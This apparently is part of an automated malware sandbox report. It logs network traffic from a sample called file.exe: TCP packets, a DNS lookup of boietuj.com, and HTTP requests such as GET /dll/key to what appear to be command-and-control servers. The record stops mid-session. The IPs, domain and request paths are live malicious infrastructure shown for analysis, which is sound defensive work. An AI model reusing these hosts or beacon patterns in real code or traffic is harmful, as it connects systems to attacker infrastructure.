                                                                Nov 20, 2024 05:02:22.299184084 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:22.299192905 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:22.299195051 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:22.299211979 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:22.299215078 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:22.299228907 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:22.299232006 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:22.299242020 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:22.299268007 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:22.299289942 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:22.299304962 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:22.299329042 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:22.299345016 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:22.299349070 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:22.299349070 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:22.299360037 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:22.299376965 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:22.299377918 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:22.299400091 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:22.299415112 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:22.299418926 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:22.299443960 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:22.299452066 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:22.299462080 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:22.299478054 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:22.299479008 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:22.299494982 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:22.299495935 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:22.299510956 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:22.299511909 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:22.299526930 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:22.299526930 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:22.299540043 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:22.299545050 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:03:28.308742046 CET8049927185.208.158.202192.168.2.4
                                                                Nov 20, 2024 05:03:29.002851963 CET8049927185.208.158.202192.168.2.4
                                                                Nov 20, 2024 05:03:29.003148079 CET4992780192.168.2.4185.208.158.202
                                                                Nov 20, 2024 05:03:29.144300938 CET4992780192.168.2.4185.208.158.202
                                                                Nov 20, 2024 05:03:29.149545908 CET8049927185.208.158.202192.168.2.4
                                                                Nov 20, 2024 05:03:29.149744034 CET4992780192.168.2.4185.208.158.202
                                                                Nov 20, 2024 05:03:29.151979923 CET4993380192.168.2.4185.208.158.202
                                                                Nov 20, 2024 05:03:29.156965017 CET8049933185.208.158.202192.168.2.4
                                                                Nov 20, 2024 05:03:29.157910109 CET4993380192.168.2.4185.208.158.202
                                                                Nov 20, 2024 05:03:29.211000919 CET4993380192.168.2.4185.208.158.202
                                                                Nov 20, 2024 05:03:29.215830088 CET8049933185.208.158.202192.168.2.4
                                                                Nov 20, 2024 05:03:29.864598036 CET8049933185.208.158.202192.168.2.4
                                                                Nov 20, 2024 05:03:29.864670992 CET4993380192.168.2.4185.208.158.202
                                                                Nov 20, 2024 05:03:30.183654070 CET4993380192.168.2.4185.208.158.202
                                                                Nov 20, 2024 05:03:30.184034109 CET4993980192.168.2.4185.208.158.202
                                                                Nov 20, 2024 05:03:30.188858032 CET8049933185.208.158.202192.168.2.4
                                                                Nov 20, 2024 05:03:30.188868046 CET8049939185.208.158.202192.168.2.4
                                                                Nov 20, 2024 05:03:30.188916922 CET4993380192.168.2.4185.208.158.202
                                                                Nov 20, 2024 05:03:30.188951015 CET4993980192.168.2.4185.208.158.202
                                                                Nov 20, 2024 05:03:30.277796984 CET4993980192.168.2.4185.208.158.202
                                                                Nov 20, 2024 05:03:30.282619953 CET8049939185.208.158.202192.168.2.4
                                                                Nov 20, 2024 05:03:30.897241116 CET8049939185.208.158.202192.168.2.4
                                                                Nov 20, 2024 05:03:30.897322893 CET4993980192.168.2.4185.208.158.202
                                                                Nov 20, 2024 05:03:31.035603046 CET4993980192.168.2.4185.208.158.202
                                                                Nov 20, 2024 05:03:31.040409088 CET8049939185.208.158.202192.168.2.4
                                                                Nov 20, 2024 05:03:31.290525913 CET8049939185.208.158.202192.168.2.4
                                                                Nov 20, 2024 05:03:31.290582895 CET4993980192.168.2.4185.208.158.202
                                                                Nov 20, 2024 05:03:31.410084009 CET4993980192.168.2.4185.208.158.202
                                                                Nov 20, 2024 05:03:31.410476923 CET4994580192.168.2.4185.208.158.202
                                                                Nov 20, 2024 05:03:31.415132999 CET8049939185.208.158.202192.168.2.4
                                                                Nov 20, 2024 05:03:31.415208101 CET4993980192.168.2.4185.208.158.202
                                                                Nov 20, 2024 05:03:31.415353060 CET8049945185.208.158.202192.168.2.4
                                                                Nov 20, 2024 05:03:31.415424109 CET4994580192.168.2.4185.208.158.202
                                                                Nov 20, 2024 05:03:31.415579081 CET4994580192.168.2.4185.208.158.202
                                                                Nov 20, 2024 05:03:31.420368910 CET8049945185.208.158.202192.168.2.4
                                                                Nov 20, 2024 05:03:32.129146099 CET8049945185.208.158.202192.168.2.4
                                                                Nov 20, 2024 05:03:32.129208088 CET4994580192.168.2.4185.208.158.202
                                                                Nov 20, 2024 05:03:32.238684893 CET4994580192.168.2.4185.208.158.202
                                                                Nov 20, 2024 05:03:32.243482113 CET8049945185.208.158.202192.168.2.4
                                                                Nov 20, 2024 05:03:32.485069990 CET8049945185.208.158.202192.168.2.4
                                                                Nov 20, 2024 05:03:32.485151052 CET4994580192.168.2.4185.208.158.202
                                                                Nov 20, 2024 05:03:32.599415064 CET4994580192.168.2.4185.208.158.202
                                                                Nov 20, 2024 05:03:32.599709988 CET4995680192.168.2.4185.208.158.202
                                                                Nov 20, 2024 05:03:32.604490042 CET8049945185.208.158.202192.168.2.4
                                                                Nov 20, 2024 05:03:32.604532003 CET8049956185.208.158.202192.168.2.4
                                                                Nov 20, 2024 05:03:32.604604006 CET4994580192.168.2.4185.208.158.202
                                                                Nov 20, 2024 05:03:32.604654074 CET4995680192.168.2.4185.208.158.202
                                                                Nov 20, 2024 05:03:32.604738951 CET4995680192.168.2.4185.208.158.202
                                                                Nov 20, 2024 05:03:32.609603882 CET8049956185.208.158.202192.168.2.4
                                                                Nov 20, 2024 05:03:33.320471048 CET8049956185.208.158.202192.168.2.4
                                                                Nov 20, 2024 05:03:33.323395967 CET4995680192.168.2.4185.208.158.202
                                                                Nov 20, 2024 05:03:33.441109896 CET4995680192.168.2.4185.208.158.202
                                                                Nov 20, 2024 05:03:33.441550970 CET4996280192.168.2.4185.208.158.202
                                                                Nov 20, 2024 05:03:33.446192026 CET8049956185.208.158.202192.168.2.4
                                                                Nov 20, 2024 05:03:33.446336985 CET8049962185.208.158.202192.168.2.4
                                                                Nov 20, 2024 05:03:33.446399927 CET4995680192.168.2.4185.208.158.202
                                                                Nov 20, 2024 05:03:33.446443081 CET4996280192.168.2.4185.208.158.202
                                                                Nov 20, 2024 05:03:33.446572065 CET4996280192.168.2.4185.208.158.202
                                                                Nov 20, 2024 05:03:33.451406002 CET8049962185.208.158.202192.168.2.4
                                                                Nov 20, 2024 05:03:34.155354977 CET8049962185.208.158.202192.168.2.4
                                                                Nov 20, 2024 05:03:34.155421972 CET4996280192.168.2.4185.208.158.202
                                                                Nov 20, 2024 05:03:34.269321918 CET4996280192.168.2.4185.208.158.202
                                                                Nov 20, 2024 05:03:34.269623995 CET4996880192.168.2.4185.208.158.202
                                                                Nov 20, 2024 05:03:34.435076952 CET8049968185.208.158.202192.168.2.4
                                                                Nov 20, 2024 05:03:34.435152054 CET4996880192.168.2.4185.208.158.202
                                                                Nov 20, 2024 05:03:34.435309887 CET4996880192.168.2.4185.208.158.202
                                                                Nov 20, 2024 05:03:34.435679913 CET8049962185.208.158.202192.168.2.4
                                                                Nov 20, 2024 05:03:34.435730934 CET4996280192.168.2.4185.208.158.202
                                                                Nov 20, 2024 05:03:34.441090107 CET8049968185.208.158.202192.168.2.4
                                                                Nov 20, 2024 05:03:35.150048018 CET8049968185.208.158.202192.168.2.4
                                                                Nov 20, 2024 05:03:35.150207043 CET4996880192.168.2.4185.208.158.202
                                                                Nov 20, 2024 05:03:35.314006090 CET4996880192.168.2.4185.208.158.202
                                                                Nov 20, 2024 05:03:35.319127083 CET8049968185.208.158.202192.168.2.4
                                                                Nov 20, 2024 05:03:35.319416046 CET4996880192.168.2.4185.208.158.202
                                                                Nov 20, 2024 05:03:35.325309038 CET4997480192.168.2.4185.208.158.202
                                                                Nov 20, 2024 05:03:35.330176115 CET8049974185.208.158.202192.168.2.4
                                                                Nov 20, 2024 05:03:35.331409931 CET4997480192.168.2.4185.208.158.202
                                                                Nov 20, 2024 05:03:35.335510969 CET4997480192.168.2.4185.208.158.202
                                                                Nov 20, 2024 05:03:35.340344906 CET8049974185.208.158.202192.168.2.4
                                                                Nov 20, 2024 05:03:36.033191919 CET8049974185.208.158.202192.168.2.4
                                                                Nov 20, 2024 05:03:36.033281088 CET4997480192.168.2.4185.208.158.202
                                                                Nov 20, 2024 05:03:36.270299911 CET4997480192.168.2.4185.208.158.202
                                                                Nov 20, 2024 05:03:36.270648956 CET4998080192.168.2.4185.208.158.202
                                                                Nov 20, 2024 05:03:36.275515079 CET8049974185.208.158.202192.168.2.4
                                                                Nov 20, 2024 05:03:36.275556087 CET8049980185.208.158.202192.168.2.4
                                                                Nov 20, 2024 05:03:36.275578976 CET4997480192.168.2.4185.208.158.202
                                                                Nov 20, 2024 05:03:36.275629044 CET4998080192.168.2.4185.208.158.202
                                                                Nov 20, 2024 05:03:36.276232958 CET4998080192.168.2.4185.208.158.202
                                                                Nov 20, 2024 05:03:36.281094074 CET8049980185.208.158.202192.168.2.4
                                                                Nov 20, 2024 05:03:36.988056898 CET8049980185.208.158.202192.168.2.4
                                                                Nov 20, 2024 05:03:36.989737034 CET4998080192.168.2.4185.208.158.202
                                                                Nov 20, 2024 05:03:37.106259108 CET4998080192.168.2.4185.208.158.202
                                                                Nov 20, 2024 05:03:37.111176968 CET8049980185.208.158.202192.168.2.4
                                                                Nov 20, 2024 05:03:37.359772921 CET8049980185.208.158.202192.168.2.4
                                                                Nov 20, 2024 05:03:37.360946894 CET4998080192.168.2.4185.208.158.202
                                                                Nov 20, 2024 05:03:37.472235918 CET4998080192.168.2.4185.208.158.202
                                                                Nov 20, 2024 05:03:37.477138996 CET8049980185.208.158.202192.168.2.4
                                                                Nov 20, 2024 05:03:37.716728926 CET8049980185.208.158.202192.168.2.4
                                                                Nov 20, 2024 05:03:37.716797113 CET4998080192.168.2.4185.208.158.202
                                                                Nov 20, 2024 05:03:37.831643105 CET4998080192.168.2.4185.208.158.202
                                                                Nov 20, 2024 05:03:37.831892967 CET4999180192.168.2.4185.208.158.202
                                                                Nov 20, 2024 05:03:37.836870909 CET8049991185.208.158.202192.168.2.4
                                                                Nov 20, 2024 05:03:37.836961031 CET4999180192.168.2.4185.208.158.202
                                                                Nov 20, 2024 05:03:37.836998940 CET8049980185.208.158.202192.168.2.4
                                                                Nov 20, 2024 05:03:37.837161064 CET4999180192.168.2.4185.208.158.202
                                                                Nov 20, 2024 05:03:37.837181091 CET4998080192.168.2.4185.208.158.202
                                                                Nov 20, 2024 05:03:37.842107058 CET8049991185.208.158.202192.168.2.4
                                                                Nov 20, 2024 05:03:38.564037085 CET8049991185.208.158.202192.168.2.4
                                                                Nov 20, 2024 05:03:38.564117908 CET4999180192.168.2.4185.208.158.202
                                                                Nov 20, 2024 05:03:38.675477982 CET4999180192.168.2.4185.208.158.202
                                                                Nov 20, 2024 05:03:38.680392027 CET8049991185.208.158.202192.168.2.4
                                                                Nov 20, 2024 05:03:38.925234079 CET8049991185.208.158.202192.168.2.4
                                                                Nov 20, 2024 05:03:38.925441980 CET4999180192.168.2.4185.208.158.202
                                                                Nov 20, 2024 05:03:39.277730942 CET4999180192.168.2.4185.208.158.202
                                                                Nov 20, 2024 05:03:39.278008938 CET4999980192.168.2.4185.208.158.202
                                                                Nov 20, 2024 05:03:39.282916069 CET8049991185.208.158.202192.168.2.4
                                                                Nov 20, 2024 05:03:39.282982111 CET8049999185.208.158.202192.168.2.4
                                                                Nov 20, 2024 05:03:39.282985926 CET4999180192.168.2.4185.208.158.202
                                                                Nov 20, 2024 05:03:39.283041000 CET4999980192.168.2.4185.208.158.202
                                                                Nov 20, 2024 05:03:39.288073063 CET4999980192.168.2.4185.208.158.202
                                                                Nov 20, 2024 05:03:39.293015957 CET8049999185.208.158.202192.168.2.4
                                                                Nov 20, 2024 05:03:39.993458986 CET8049999185.208.158.202192.168.2.4
                                                                Nov 20, 2024 05:03:39.993515968 CET4999980192.168.2.4185.208.158.202
                                                                Nov 20, 2024 05:03:40.122473955 CET4999980192.168.2.4185.208.158.202
                                                                Nov 20, 2024 05:03:40.122962952 CET5000480192.168.2.4185.208.158.202
                                                                Nov 20, 2024 05:03:40.127655029 CET8049999185.208.158.202192.168.2.4
                                                                Nov 20, 2024 05:03:40.127706051 CET4999980192.168.2.4185.208.158.202
                                                                Nov 20, 2024 05:03:40.127975941 CET8050004185.208.158.202192.168.2.4
                                                                Nov 20, 2024 05:03:40.128037930 CET5000480192.168.2.4185.208.158.202
                                                                Nov 20, 2024 05:03:40.132663012 CET5000480192.168.2.4185.208.158.202
                                                                Nov 20, 2024 05:03:40.137545109 CET8050004185.208.158.202192.168.2.4
                                                                Nov 20, 2024 05:03:40.836936951 CET8050004185.208.158.202192.168.2.4
                                                                Nov 20, 2024 05:03:40.837006092 CET5000480192.168.2.4185.208.158.202
                                                                Nov 20, 2024 05:03:40.956734896 CET5000480192.168.2.4185.208.158.202
                                                                Nov 20, 2024 05:03:40.956971884 CET5001180192.168.2.4185.208.158.202
                                                                Nov 20, 2024 05:03:40.961790085 CET8050011185.208.158.202192.168.2.4
                                                                Nov 20, 2024 05:03:40.961847067 CET8050004185.208.158.202192.168.2.4
                                                                Nov 20, 2024 05:03:40.961874962 CET5001180192.168.2.4185.208.158.202
                                                                Nov 20, 2024 05:03:40.961932898 CET5000480192.168.2.4185.208.158.202
                                                                Nov 20, 2024 05:03:40.962019920 CET5001180192.168.2.4185.208.158.202
                                                                Nov 20, 2024 05:03:40.966830969 CET8050011185.208.158.202192.168.2.4
                                                                Nov 20, 2024 05:03:41.685043097 CET8050011185.208.158.202192.168.2.4
                                                                Nov 20, 2024 05:03:41.685590029 CET5001180192.168.2.4185.208.158.202
                                                                Nov 20, 2024 05:03:41.801606894 CET5001180192.168.2.4185.208.158.202
                                                                Nov 20, 2024 05:03:41.802067995 CET5001780192.168.2.4185.208.158.202
                                                                Nov 20, 2024 05:03:41.806904078 CET8050011185.208.158.202192.168.2.4
                                                                Nov 20, 2024 05:03:41.806921959 CET8050017185.208.158.202192.168.2.4
                                                                Nov 20, 2024 05:03:41.806976080 CET5001180192.168.2.4185.208.158.202
                                                                Nov 20, 2024 05:03:41.807060957 CET5001780192.168.2.4185.208.158.202
                                                                Nov 20, 2024 05:03:41.807394028 CET5001780192.168.2.4185.208.158.202
                                                                Nov 20, 2024 05:03:41.812263012 CET8050017185.208.158.202192.168.2.4
                                                                Nov 20, 2024 05:03:42.515575886 CET8050017185.208.158.202192.168.2.4
                                                                Nov 20, 2024 05:03:42.515662909 CET5001780192.168.2.4185.208.158.202
                                                                Nov 20, 2024 05:03:42.631006956 CET5001780192.168.2.4185.208.158.202
                                                                Nov 20, 2024 05:03:42.631294966 CET5002380192.168.2.4185.208.158.202
                                                                Nov 20, 2024 05:03:42.636187077 CET8050017185.208.158.202192.168.2.4
                                                                Nov 20, 2024 05:03:42.636238098 CET8050023185.208.158.202192.168.2.4
                                                                Nov 20, 2024 05:03:42.636264086 CET5001780192.168.2.4185.208.158.202
                                                                Nov 20, 2024 05:03:42.636308908 CET5002380192.168.2.4185.208.158.202
                                                                Nov 20, 2024 05:03:42.636518955 CET5002380192.168.2.4185.208.158.202
                                                                Nov 20, 2024 05:03:42.641343117 CET8050023185.208.158.202192.168.2.4
                                                                Nov 20, 2024 05:03:43.344048023 CET8050023185.208.158.202192.168.2.4
                                                                Nov 20, 2024 05:03:43.344137907 CET5002380192.168.2.4185.208.158.202
                                                                Nov 20, 2024 05:03:43.457981110 CET5002380192.168.2.4185.208.158.202
                                                                Nov 20, 2024 05:03:43.458350897 CET5002880192.168.2.4185.208.158.202
                                                                Nov 20, 2024 05:03:43.464647055 CET8050023185.208.158.202192.168.2.4
                                                                Nov 20, 2024 05:03:43.464713097 CET5002380192.168.2.4185.208.158.202
                                                                Nov 20, 2024 05:03:43.464793921 CET8050028185.208.158.202192.168.2.4
                                                                Nov 20, 2024 05:03:43.464883089 CET5002880192.168.2.4185.208.158.202
                                                                Nov 20, 2024 05:03:43.465081930 CET5002880192.168.2.4185.208.158.202
                                                                Nov 20, 2024 05:03:43.471421957 CET8050028185.208.158.202192.168.2.4
                                                                Nov 20, 2024 05:03:44.181684017 CET8050028185.208.158.202192.168.2.4
                                                                Nov 20, 2024 05:03:44.181802034 CET5002880192.168.2.4185.208.158.202
                                                                Nov 20, 2024 05:03:44.301459074 CET5002880192.168.2.4185.208.158.202
                                                                Nov 20, 2024 05:03:44.301733971 CET5002980192.168.2.4185.208.158.202
                                                                Nov 20, 2024 05:03:44.306557894 CET8050029185.208.158.202192.168.2.4
                                                                Nov 20, 2024 05:03:44.306632042 CET8050028185.208.158.202192.168.2.4
                                                                Nov 20, 2024 05:03:44.306644917 CET5002980192.168.2.4185.208.158.202
                                                                Nov 20, 2024 05:03:44.306690931 CET5002880192.168.2.4185.208.158.202
                                                                Nov 20, 2024 05:03:44.306833029 CET5002980192.168.2.4185.208.158.202
                                                                Nov 20, 2024 05:03:44.311646938 CET8050029185.208.158.202192.168.2.4
                                                                Nov 20, 2024 05:03:45.014478922 CET8050029185.208.158.202192.168.2.4
                                                                Nov 20, 2024 05:03:45.014578104 CET5002980192.168.2.4185.208.158.202
                                                                Nov 20, 2024 05:03:45.128609896 CET5002980192.168.2.4185.208.158.202
                                                                Nov 20, 2024 05:03:45.128947973 CET5003080192.168.2.4185.208.158.202
                                                                Nov 20, 2024 05:03:45.133725882 CET8050029185.208.158.202192.168.2.4
                                                                Nov 20, 2024 05:03:45.133793116 CET8050030185.208.158.202192.168.2.4
                                                                Nov 20, 2024 05:03:45.133810043 CET5002980192.168.2.4185.208.158.202
                                                                Nov 20, 2024 05:03:45.133955956 CET5003080192.168.2.4185.208.158.202
                                                                Nov 20, 2024 05:03:45.134144068 CET5003080192.168.2.4185.208.158.202
                                                                Nov 20, 2024 05:03:45.138936996 CET8050030185.208.158.202192.168.2.4
                                                                Nov 20, 2024 05:03:45.841032982 CET8050030185.208.158.202192.168.2.4
                                                                Nov 20, 2024 05:03:45.841219902 CET5003080192.168.2.4185.208.158.202
                                                                Nov 20, 2024 05:03:45.956696033 CET5003080192.168.2.4185.208.158.202
                                                                Nov 20, 2024 05:03:45.957006931 CET5003180192.168.2.4185.208.158.202
                                                                Nov 20, 2024 05:03:45.961796045 CET8050031185.208.158.202192.168.2.4
                                                                Nov 20, 2024 05:03:45.961807966 CET8050030185.208.158.202192.168.2.4
                                                                Nov 20, 2024 05:03:45.961894989 CET5003080192.168.2.4185.208.158.202
                                                                Nov 20, 2024 05:03:45.961946964 CET5003180192.168.2.4185.208.158.202
                                                                Nov 20, 2024 05:03:45.962088108 CET5003180192.168.2.4185.208.158.202
                                                                Nov 20, 2024 05:03:45.966837883 CET8050031185.208.158.202192.168.2.4
                                                                Nov 20, 2024 05:03:46.665491104 CET8050031185.208.158.202192.168.2.4
                                                                Nov 20, 2024 05:03:46.665553093 CET5003180192.168.2.4185.208.158.202
                                                                Nov 20, 2024 05:03:46.784900904 CET5003180192.168.2.4185.208.158.202
                                                                Nov 20, 2024 05:03:46.785211086 CET5003280192.168.2.4185.208.158.202
                                                                Nov 20, 2024 05:03:46.790018082 CET8050031185.208.158.202192.168.2.4
                                                                Nov 20, 2024 05:03:46.790047884 CET8050032185.208.158.202192.168.2.4
                                                                Nov 20, 2024 05:03:46.790126085 CET5003180192.168.2.4185.208.158.202
                                                                Nov 20, 2024 05:03:46.790163994 CET5003280192.168.2.4185.208.158.202
                                                                Nov 20, 2024 05:04:12.329706907 CET5005580192.168.2.4185.208.158.202
                                                                Nov 20, 2024 05:04:12.355875015 CET8050056185.208.158.202192.168.2.4
                                                                Nov 20, 2024 05:04:12.355937958 CET5005680192.168.2.4185.208.158.202
                                                                Nov 20, 2024 05:04:12.356038094 CET8050055185.208.158.202192.168.2.4
                                                                Nov 20, 2024 05:04:12.356204033 CET5005680192.168.2.4185.208.158.202
                                                                Nov 20, 2024 05:04:12.356237888 CET5005580192.168.2.4185.208.158.202
                                                                Nov 20, 2024 05:04:12.357464075 CET8050055185.208.158.202192.168.2.4
                                                                Nov 20, 2024 05:04:12.357472897 CET8050055185.208.158.202192.168.2.4
                                                                Nov 20, 2024 05:04:12.361067057 CET8050056185.208.158.202192.168.2.4
                                                                Nov 20, 2024 05:04:13.148518085 CET8050056185.208.158.202192.168.2.4
                                                                Nov 20, 2024 05:04:13.148622990 CET5005680192.168.2.4185.208.158.202
                                                                Nov 20, 2024 05:04:13.269150972 CET5005680192.168.2.4185.208.158.202
                                                                Nov 20, 2024 05:04:13.269435883 CET5005780192.168.2.4185.208.158.202
                                                                Nov 20, 2024 05:04:13.274209976 CET8050056185.208.158.202192.168.2.4
                                                                Nov 20, 2024 05:04:13.274291992 CET8050057185.208.158.202192.168.2.4
                                                                Nov 20, 2024 05:04:13.274312019 CET5005680192.168.2.4185.208.158.202
                                                                Nov 20, 2024 05:04:13.274492979 CET5005780192.168.2.4185.208.158.202
                                                                Nov 20, 2024 05:04:13.274492979 CET5005780192.168.2.4185.208.158.202
                                                                Nov 20, 2024 05:04:13.279387951 CET8050057185.208.158.202192.168.2.4
                                                                Nov 20, 2024 05:04:13.978082895 CET8050057185.208.158.202192.168.2.4
                                                                Nov 20, 2024 05:04:13.978185892 CET5005780192.168.2.4185.208.158.202
                                                                Nov 20, 2024 05:04:14.097311974 CET5005780192.168.2.4185.208.158.202
                                                                Nov 20, 2024 05:04:14.097649097 CET5005880192.168.2.4185.208.158.202
                                                                Nov 20, 2024 05:04:14.103270054 CET8050058185.208.158.202192.168.2.4
                                                                Nov 20, 2024 05:04:14.103285074 CET8050057185.208.158.202192.168.2.4
                                                                Nov 20, 2024 05:04:14.103346109 CET5005880192.168.2.4185.208.158.202
                                                                Nov 20, 2024 05:04:14.103454113 CET5005780192.168.2.4185.208.158.202
                                                                Nov 20, 2024 05:04:14.103496075 CET5005880192.168.2.4185.208.158.202
                                                                Nov 20, 2024 05:04:14.108349085 CET8050058185.208.158.202192.168.2.4
                                                                Nov 20, 2024 05:04:14.830722094 CET8050058185.208.158.202192.168.2.4
                                                                Nov 20, 2024 05:04:14.830873966 CET5005880192.168.2.4185.208.158.202
                                                                Nov 20, 2024 05:04:14.945848942 CET5005880192.168.2.4185.208.158.202
                                                                Nov 20, 2024 05:04:14.951442957 CET8050058185.208.158.202192.168.2.4
                                                                Nov 20, 2024 05:04:15.203723907 CET8050058185.208.158.202192.168.2.4
                                                                Nov 20, 2024 05:04:15.203927040 CET5005880192.168.2.4185.208.158.202
                                                                Nov 20, 2024 05:04:15.315978050 CET5005880192.168.2.4185.208.158.202
                                                                Nov 20, 2024 05:04:15.316390991 CET5005980192.168.2.4185.208.158.202
                                                                Nov 20, 2024 05:04:15.321032047 CET8050058185.208.158.202192.168.2.4
                                                                Nov 20, 2024 05:04:15.321244955 CET8050059185.208.158.202192.168.2.4
                                                                Nov 20, 2024 05:04:15.321279049 CET5005880192.168.2.4185.208.158.202
                                                                Nov 20, 2024 05:04:15.321336031 CET5005980192.168.2.4185.208.158.202
                                                                Nov 20, 2024 05:04:15.321496964 CET5005980192.168.2.4185.208.158.202
                                                                Nov 20, 2024 05:04:15.326268911 CET8050059185.208.158.202192.168.2.4
                                                                Nov 20, 2024 05:04:16.026043892 CET8050059185.208.158.202192.168.2.4
                                                                Nov 20, 2024 05:04:16.029802084 CET5005980192.168.2.4185.208.158.202
                                                                Nov 20, 2024 05:04:16.145210981 CET5005980192.168.2.4185.208.158.202
                                                                Nov 20, 2024 05:04:16.145454884 CET5006080192.168.2.4185.208.158.202
                                                                Nov 20, 2024 05:04:16.150403023 CET8050060185.208.158.202192.168.2.4
                                                                Nov 20, 2024 05:04:16.150413990 CET8050059185.208.158.202192.168.2.4
                                                                Nov 20, 2024 05:04:16.150506973 CET5006080192.168.2.4185.208.158.202
                                                                Nov 20, 2024 05:04:16.150511980 CET5005980192.168.2.4185.208.158.202
                                                                Nov 20, 2024 05:04:16.150794029 CET5006080192.168.2.4185.208.158.202
                                                                Nov 20, 2024 05:04:16.155555010 CET8050060185.208.158.202192.168.2.4
                                                                Nov 20, 2024 05:04:16.852190971 CET8050060185.208.158.202192.168.2.4
                                                                Nov 20, 2024 05:04:16.852260113 CET5006080192.168.2.4185.208.158.202
                                                                Nov 20, 2024 05:04:16.972306967 CET5006080192.168.2.4185.208.158.202
                                                                Nov 20, 2024 05:04:16.972630978 CET5006180192.168.2.4185.208.158.202
                                                                Nov 20, 2024 05:04:16.977428913 CET8050061185.208.158.202192.168.2.4
                                                                Nov 20, 2024 05:04:16.977534056 CET8050060185.208.158.202192.168.2.4
                                                                Nov 20, 2024 05:04:16.977581024 CET5006080192.168.2.4185.208.158.202
                                                                Nov 20, 2024 05:04:16.977660894 CET5006180192.168.2.4185.208.158.202
                                                                Nov 20, 2024 05:04:16.977709055 CET5006180192.168.2.4185.208.158.202
                                                                Nov 20, 2024 05:04:16.982541084 CET8050061185.208.158.202192.168.2.4
                                                                Nov 20, 2024 05:04:17.704370022 CET8050061185.208.158.202192.168.2.4
                                                                Nov 20, 2024 05:04:17.704691887 CET5006180192.168.2.4185.208.158.202
                                                                Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                                                Nov 20, 2024 05:03:18.508125067 CET | 52296 | 53 | 192.168.2.4 | 45.155.250.90
                                                                Nov 20, 2024 05:03:18.542480946 CET | 53 | 52296 | 45.155.250.90 | 192.168.2.4
                                                                Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
                                                                Nov 20, 2024 05:03:18.508125067 CET | 192.168.2.4 | 45.155.250.90 | 0x9a77 | Standard query (0) | boietuj.com | A (IP address) | IN (0x0001) | false
                                                                Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
                                                                Nov 20, 2024 05:03:18.542480946 CET | 45.155.250.90 | 192.168.2.4 | 0x9a77 | No error (0) | boietuj.com | | 185.208.158.202 | A (IP address) | IN (0x0001) | false
                                                                • 185.156.72.65
                                                                • boietuj.com
                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                0 | 192.168.2.4 | 49730 | 185.156.72.65 | 80 | 6556 | C:\Users\user\Desktop\file.exe
                                                                Timestamp | Bytes transferred | Direction | Data
                                                                Nov 20, 2024 05:02:15.232590914 CET | 419 | OUT | GET /add?substr=mixeleven&s=three&sub=nosub HTTP/1.1
                                                                Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                                                                Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                                                                Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                                                                Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                                                                User-Agent: 1
                                                                Host: 185.156.72.65
                                                                Connection: Keep-Alive
                                                                Cache-Control: no-cache
                                                                Nov 20, 2024 05:02:16.048826933 CET | 204 | IN | HTTP/1.1 200 OK
                                                                Date: Wed, 20 Nov 2024 04:02:15 GMT
                                                                Server: Apache/2.4.52 (Ubuntu)
                                                                Content-Length: 1
                                                                Keep-Alive: timeout=5, max=100
                                                                Connection: Keep-Alive
                                                                Content-Type: text/html; charset=UTF-8
                                                                Data Raw: 31
                                                                Data Ascii: 1
                                                                Nov 20, 2024 05:02:16.306072950 CET | 388 | OUT | GET /dll/key HTTP/1.1
                                                                Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                                                                Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                                                                Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                                                                Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                                                                User-Agent: 1
                                                                Host: 185.156.72.65
                                                                Connection: Keep-Alive
                                                                Cache-Control: no-cache
                                                                Nov 20, 2024 05:02:17.378030062 CET | 224 | IN | HTTP/1.1 200 OK
